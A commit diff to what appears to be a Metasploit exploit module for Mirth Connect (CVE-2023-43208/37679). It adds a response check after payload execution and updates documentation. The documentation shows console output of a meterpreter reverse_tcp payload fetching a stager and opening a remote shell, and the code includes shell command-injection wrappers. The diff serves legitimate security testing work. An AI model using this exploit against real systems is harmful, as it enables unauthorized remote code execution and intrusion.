Check the response when exploiting

zeroSteiner · zeroSteiner · commit 577898d91bea · 2024-01-29T14:38:49.000-05:00
diff --git a/documentation/modules/exploit/multi/http/mirth_connect_cve_2023_43208.md b/documentation/modules/exploit/multi/http/mirth_connect_cve_2023_43208.md
@@ -57,6 +57,7 @@ msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > exploit
 [*] Detected target version: 4.1.1
 [+] The target appears to be vulnerable. Version 4.1.1 is affected by CVE-2023-37679.
 [*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command)
+[+] The target appears to have executed the payload.
 [*] Client 192.168.159.128 requested /jvE_gjDKxuQo86-91TitNQ
 [*] Sending payload to 192.168.159.128 (curl/7.74.0)
 [*] Transmitting intermediate stager...(126 bytes)
@@ -97,6 +98,7 @@ msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > run
 [*] Detected target version: 4.4.0
 [+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208.
 [*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
+[+] The target appears to have executed the payload.
 [*] Sending stage (201798 bytes) to 192.168.159.10
 [*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.10:60705) at 2024-01-26 17:10:20 -0500
 
diff --git a/modules/exploits/multi/http/mirth_connect_cve_2023_43208.rb b/modules/exploits/multi/http/mirth_connect_cve_2023_43208.rb
@@ -124,12 +124,20 @@ def exploit
     if target_version <= Rex::Version.new('4.3.0')
       # The CVE-2023-43208 gadget chain will also work here but use the old one to verify the original vulnerability
       # which did not implement the deny-list logic that was bypassed by the newer chain
-      execute_command_cve_2023_37679(payload.encoded)
+      res = execute_command_cve_2023_37679(payload.encoded)
     elsif target_version <= Rex::Version.new('4.4.0')
-      execute_command_cve_2023_43208(payload.encoded)
+      res = execute_command_cve_2023_43208(payload.encoded)
     else
       fail_with(Failure::NoTarget, "Version #{target_version} is not vulnerable.")
     end
+
+    if res.nil?
+      fail_with(Failure::Unreachable, 'Failed to execute the payload.')
+    elsif res.code != 500
+      fail_with(Failure::UnexpectedReply, 'Failed to execute the payload.')
+    end
+
+    print_good('The target appears to have executed the payload.')
   end
 
   def execute_command_cve_2023_37679(cmd, _opts = {})
@@ -164,13 +172,14 @@ def execute_command_cve_2023_37679(cmd, _opts = {})
       'data' => xml
     })
 
-    res&.code == 500
+    res
   end
 
   def execute_command_cve_2023_43208(cmd, _opts = {})
     if target['Platform'] == 'win'
       cmd = "cmd.exe /c \"#{cmd}\""
     else
+      # see: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html
       cmd = "sh -c $@|sh . echo #{cmd}"
     end
 
@@ -238,6 +247,6 @@ def execute_command_cve_2023_43208(cmd, _opts = {})
       'data' => xml
     })
 
-    res&.code == 500
+    res
   end
 end
